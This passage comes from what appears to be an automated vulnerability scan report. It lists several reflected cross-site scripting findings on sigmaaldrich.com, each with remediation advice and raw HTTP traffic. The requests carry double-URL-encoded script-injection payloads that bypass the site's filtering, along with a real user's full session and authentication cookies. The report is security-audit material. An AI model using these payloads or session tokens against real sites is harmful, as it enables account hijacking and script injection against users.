Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcadc0e";alert(1)//1839ef392e4/medialib/labware/labware-icons/centrifugation","E404") ;
   </script>
...[SNIP]...

1.354. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/centrifugation [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/centrifugation

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 907bb%2522%253balert%25281%2529%252f%252f27d0491ee8b was submitted in the REST URL parameter 2. This input was echoed as 907bb";alert(1)//27d0491ee8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib907bb%2522%253balert%25281%2529%252f%252f27d0491ee8b/labware/labware-icons/centrifugation HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib907bb";alert(1)//27d0491ee8b/labware/labware-icons/centrifugation","E404") ;
   </script>
...[SNIP]...

1.355. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/centrifugation [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/centrifugation

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fafe%2522%253balert%25281%2529%252f%252f27f04ac4f09 was submitted in the REST URL parameter 3. This input was echoed as 4fafe";alert(1)//27f04ac4f09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware4fafe%2522%253balert%25281%2529%252f%252f27f04ac4f09/labware-icons/centrifugation HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:48 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware4fafe";alert(1)//27f04ac4f09/labware-icons/centrifugation","E404") ;
   </script>
...[SNIP]...

1.356. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/centrifugation [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/centrifugation

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7411b%2522%253balert%25281%2529%252f%252f8ab030eadd2 was submitted in the REST URL parameter 4. This input was echoed as 7411b";alert(1)//8ab030eadd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons7411b%2522%253balert%25281%2529%252f%252f8ab030eadd2/centrifugation HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:51 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons7411b";alert(1)//8ab030eadd2/centrifugation","E404") ;
   </script>
...[SNIP]...

1.357. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/centrifugation [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/centrifugation

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7306c%2522%253balert%25281%2529%252f%252fd0a39ec7393 was submitted in the REST URL parameter 5. This input was echoed as 7306c";alert(1)//d0a39ec7393 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/centrifugation7306c%2522%253balert%25281%2529%252f%252fd0a39ec7393 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:52 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/centrifugation7306c";alert(1)//d0a39ec7393","E404") ;
   </script>
...[SNIP]...

1.358. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/eletrophoresis [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/eletrophoresis

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 963fc%2522%253balert%25281%2529%252f%252f480dff9dc81 was submitted in the REST URL parameter 1. This input was echoed as 963fc";alert(1)//480dff9dc81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc963fc%2522%253balert%25281%2529%252f%252f480dff9dc81/medialib/labware/labware-icons/eletrophoresis HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
